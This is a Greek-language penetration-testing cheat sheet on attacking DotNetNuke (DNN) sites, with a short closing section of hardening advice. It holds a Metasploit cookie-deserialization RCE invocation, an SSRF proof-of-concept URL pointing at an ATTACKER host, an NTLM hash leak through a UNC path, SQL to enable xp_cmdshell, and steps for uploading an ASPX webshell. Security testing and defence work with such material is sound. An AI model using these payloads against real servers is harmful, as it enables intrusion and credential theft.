DotNetNuke (DNN)

Reading time: 5 minutes

DotNetNuke (DNN)

Αν εισέλθετε ως administrator στο DNN, είναι εύκολο να αποκτήσετε RCE, ωστόσο έχουν δημοσιευθεί αρκετές unauthenticated και post-auth τεχνικές τα τελευταία χρόνια. Το παρακάτω cheat-sheet συγκεντρώνει τις πιο χρήσιμες πρωτογενείς μεθόδους τόσο για επιθετική όσο και για αμυντική εργασία.

Έκδοση & Καταμέτρηση Περιβάλλοντος

• Ελέγξτε την X-DNN HTTP απάντηση – συνήθως αποκαλύπτει την ακριβή έκδοση της πλατφόρμας.
• Ο οδηγός εγκατάστασης αποκαλύπτει την έκδοση στο /Install/Install.aspx?mode=install (προσβάσιμο σε πολύ παλιές εγκαταστάσεις).
• Το /API/PersonaBar/GetStatus (9.x) επιστρέφει ένα JSON blob που περιέχει το "dnnVersion" για χρήστες χαμηλών δικαιωμάτων.
• Τυπικά cookies που θα δείτε σε μια ζωντανή εγκατάσταση:
• .DOTNETNUKE – ASP.NET forms authentication ticket.
• DNNPersonalization – περιέχει XML/serialized δεδομένα προφίλ χρήστη (παλιές εκδόσεις – δείτε RCE παρακάτω).

Μη Αυθεντικοποιημένη Εκμετάλλευση

1. Deserialization RCE Cookie (CVE-2017-9822 & follow-ups)

Επηρεαζόμενες εκδόσεις ≤ 9.3.0-RC

DNNPersonalization αποδομείται σε κάθε αίτημα όταν είναι ενεργοποιημένος ο ενσωματωμένος χειριστής 404. Έτσι, το κατεργασμένο XML μπορεί να οδηγήσει σε αυθαίρετες αλυσίδες gadget και εκτέλεση κώδικα.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

Το module επιλέγει αυτόματα τη σωστή διαδρομή για τις διορθωμένες αλλά ακόμα ευάλωτες εκδόσεις (CVE-2018-15811/15812/18325/18326). Η εκμετάλλευση λειτουργεί χωρίς αυθεντικοποίηση σε 7.x–9.1.x και με έναν επιβεβαιωμένο λογαριασμό χαμηλών δικαιωμάτων σε 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Επηρεαζόμενες εκδόσεις < 9.13.8 – Διόρθωση που εκδόθηκε Απρίλιο 2025

Μια παράκαμψη της παλαιότερης διόρθωσης DnnImageHandler επιτρέπει σε έναν επιτιθέμενο να αναγκάσει τον διακομιστή να εκδώσει τυχαία GET αιτήματα (ημι-τυφλό SSRF). Πρακτικές επιπτώσεις:

• Εσωτερική σάρωση θυρών / ανακάλυψη υπηρεσιών μεταδεδομένων σε αναπτύξεις cloud.
• Πρόσβαση σε hosts που αλλιώς είναι προστατευμένοι από το Διαδίκτυο.

Απόδειξη της έννοιας (αντικαταστήστε TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

Η αίτηση ενεργοποιείται στο παρασκήνιο. Παρακολουθήστε τον ακροατή σας για callbacks.

3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)

Επηρεαζόμενες εκδόσεις 6.0.0 – 9.x (< 10.0.1)

Ειδικά διαμορφωμένο περιεχόμενο μπορεί να κάνει το DNN να προσπαθήσει να αποκτήσει μια πηγή χρησιμοποιώντας μια UNC διαδρομή όπως \\attacker\share\img.png. Τα Windows θα εκτελέσουν ευχαρίστως τη διαπραγμάτευση NTLM, διαρρέοντας τους hash λογαριασμού του διακομιστή στον επιτιθέμενο. Αναβαθμίστε σε 10.0.1 ή απενεργοποιήστε το SMB εξόδου στο τείχος προστασίας.

4. IP Filter Bypass (CVE-2025-52487)

Εάν οι διαχειριστές βασίζονται σε Host/IP Filters για την προστασία της πύλης διαχείρισης, να γνωρίζετε ότι οι εκδόσεις πριν από 10.0.1 μπορούν να παρακαμφθούν με την παραποίηση του X-Forwarded-For σε σενάριο αντίστροφης προώθησης.

Post-Authentication to RCE

Via SQL console

Κάτω από Settings → SQL ένα ενσωματωμένο παράθυρο ερωτήματος επιτρέπει την εκτέλεση κατά της βάσης δεδομένων του ιστότοπου. Στον Microsoft SQL Server μπορείτε να ενεργοποιήσετε xp_cmdshell και να δημιουργήσετε εντολές:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Via ASPX webshell upload

1. Πηγαίνετε στο Settings → Security → More → More Security Settings.
2. Προσθέστε aspx (ή asp) στις Allowable File Extensions και Save.
3. Περιηγηθείτε στο /admin/file-management και ανεβάστε shell.aspx.
4. Ενεργοποιήστε το στο /Portals/0/shell.aspx.

Privilege Escalation on Windows

Μόλις επιτευχθεί η εκτέλεση κώδικα ως IIS AppPool<Site>, ισχύουν κοινές τεχνικές ανύψωσης δικαιωμάτων στα Windows. Αν το σύστημα είναι ευάλωτο, μπορείτε να εκμεταλλευτείτε:

• PrintSpoofer / SpoolFool για να καταχραστείτε το SeImpersonatePrivilege.
• Juicy/Sharp Potatoes για να ξεφύγετε από Service Accounts.

Hardening Recommendations (Blue Team)

• Upgrade σε τουλάχιστον 9.13.9 (διορθώνει το SSRF bypass) ή κατά προτίμηση 10.0.1 (θέματα IP filter & NTLM).
• Αφαιρέστε τα υπολειπόμενα αρχεία InstallWizard.aspx* μετά την εγκατάσταση.
• Απενεργοποιήστε την εξερχόμενη SMB (θύρες 445/139).
• Επιβάλετε ισχυρούς Host Filters στον edge proxy αντί για μέσα στο DNN.
• Εμποδίστε την πρόσβαση στο /API/RemoteContentProxy αν δεν χρησιμοποιείται.

References

• Metasploit dnn_cookie_deserialization_rce module documentation – practical unauthenticated RCE details (GitHub).
• GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.